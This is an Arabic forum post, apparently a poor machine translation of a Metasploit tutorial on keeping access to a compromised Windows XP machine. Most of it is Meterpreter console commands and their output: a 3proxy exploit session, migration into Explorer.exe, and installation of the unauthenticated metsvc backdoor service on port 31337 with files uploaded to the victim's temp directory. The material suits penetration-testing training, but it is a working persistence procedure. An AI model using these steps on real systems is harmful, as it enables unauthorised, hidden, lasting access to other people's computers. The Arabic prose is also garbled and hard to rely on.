بعد اجتياز كل العمل الشاق من استغلال نظام ، انها غالبا ما تكون فكرة جيدة أن تترك نفسك أسهل طريق العودة إلى النظام في وقت لاحق. بهذه الطريقة ، إذا كانت الخدمة التي تستغل باستمرار أو مصححة ، يمكنك الحصول يزال الوصول إلى النظام. هذا هو المكان الذي الكسندر سوتيروف 'metsvc' تأتي في متناول اليدين ، وأضيف مؤخرا إلى جذع Metasploit. لنقرأ عن تنفيذ الأصلي metsvc ، انتقل إلى http://www.phreedom.org/software/metsvc/.

باستخدام هذا الباب الخلفي ، ويمكنك الحصول على قذيفة Meterpreter في أي لحظة.

كلمة واحدة من التحذير هنا قبل أن نذهب إلى أبعد من ذلك. Metsvc كما هو موضح هنا لا يتطلب مصادقة. وهذا يعني أن أي شخص أن يتم الوصول إلى الميناء ويمكن الوصول إلى حسابك في الباب الخلفي! هذا ليس أمرا جيدا إذا كنت إجراء اختبار الاختراق ، وهذا يمكن أن يكون خطرا كبيرا. في حالة العالم الحقيقي ، وكنت إما تغيير المصدر إلى تتطلب مصادقة ، أو تصفية الاتصالات البعيدة إلى المنفذ من خلال بعض الطرق الأخرى.

أولا ، نحن استغلال النظام البعيد والهجرة إلى 'عملية Explorer.exe' في حالة إشعارات مستخدم الخدمة لا يستجيب للاستغلال ، وتقرر أن تقتلها.

msf exploit(3proxy) > exploit

[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
132 ctfmon.exe C:WINDOWSsystem32ctfmon.exe
176 svchost.exe C:WINDOWSsystem32svchost.exe
440 VMwareService.exe C:Program FilesVMwareVMware ToolsVMwareService.exe
632 Explorer.EXE C:WINDOWSExplorer.EXE
796 smss.exe SystemRootSystem32smss.exe
836 VMwareTray.exe C:Program FilesVMwareVMware ToolsVMwareTray.exe
844 VMwareUser.exe C:Program FilesVMwareVMware ToolsVMwareUser.exe
884 csrss.exe ??C:WINDOWSsystem32csrss.exe
908 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
952 services.exe C:WINDOWSsystem32services.exe
964 lsass.exe C:WINDOWSsystem32lsass.exe
1120 vmacthlp.exe C:Program FilesVMwareVMware Toolsvmacthlp.exe
1136 svchost.exe C:WINDOWSsystem32svchost.exe
1236 svchost.exe C:WINDOWSsystem32svchost.exe
1560 alg.exe C:WINDOWSSystem32alg.exe
1568 WZCSLDR2.exe C:Program FilesANIANIWZCS2 ServiceWZCSLDR2.exe
1596 jusched.exe C:Program FilesJavajre6injusched.exe
1656 msmsgs.exe C:Program FilesMessengermsmsgs.exe
1748 spoolsv.exe C:WINDOWSsystem32spoolsv.exe
1928 jqs.exe C:Program FilesJavajre6injqs.exe
2028 snmp.exe C:WINDOWSSystem32snmp.exe
2840 3proxy.exe C:3proxyin3proxy.exe
3000 mmc.exe C:WINDOWSsystem32mmc.exe

meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.


قبل تثبيت metsvc ، دعونا نرى ما هي الخيارات المتاحة لنا.


meterpreter > run metsvc -h
[*]
OPTIONS:

-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)

meterpreter >

منذ كنت متصلا بالفعل نحن من خلال الدورة Meterpreter ، فإننا لن تعيينها لربط العودة الى لنا على الفور. سنقوم فقط تثبيت الخدمة في الوقت الراهن.

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:DOCUME~1victimLOCALS~1TempJplTpVnksh...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
[*] * Installing service metsvc
* Starting service
Service metsvc successfully installed.


وهناك نذهب! الآن تركيب الخدمة وانتظار اتصال. دعونا لا يبقيه الانتظار الطويلة

NOW INTERACTING WITH METSVC

ونحن الآن استخدام متعدد / معالج مع حمولة من 'ويندوز / metsvc_bind_tcp' للاتصال النظام البعيد. وقد تم إنجاز هذا هو الحمولة الخاصة ، وعادة ما حمولة Meterpreter ومتعددة المراحل ، حيث يتم إرسال كمية ضئيلة من رمز كجزء من استغلال ، ومن ثم يتم تحميل أكثر بعد تنفيذ التعليمات البرمجية.

اعتقد صاروخ مكوك ، والصواريخ التي تستخدم معززة للحصول على مكوك الفضاء الى المدار. هذا هو الشيء نفسه ، باستثناء بدلا من بنود اضافية يجري هناك ، واسقاط ثم الخروج ، Meterpreter تبدأ صغيرة قدر الإمكان ، ثم يضيف في. لكن في هذه الحالة ، وقد تم بالفعل رمز Meterpreter كامل تحميلها على الجهاز البعيد ، وليس هناك حاجة للاتصال على مراحل.

وضعنا كل خياراتنا ل 'metsvc_bind_tcp' معالجة الملكية الفكرية مع الضحية وميناء نود الحصول على خدمة الاتصال على الجهاز لدينا. نحن تشغيل ثم استغلالها.

انصحك بالدهاب الى هادا الينك ايضا http://www.offensive-security....unleashed/ من هناك ابحت عن maintaining Access then click on واقرا الخياراث كلها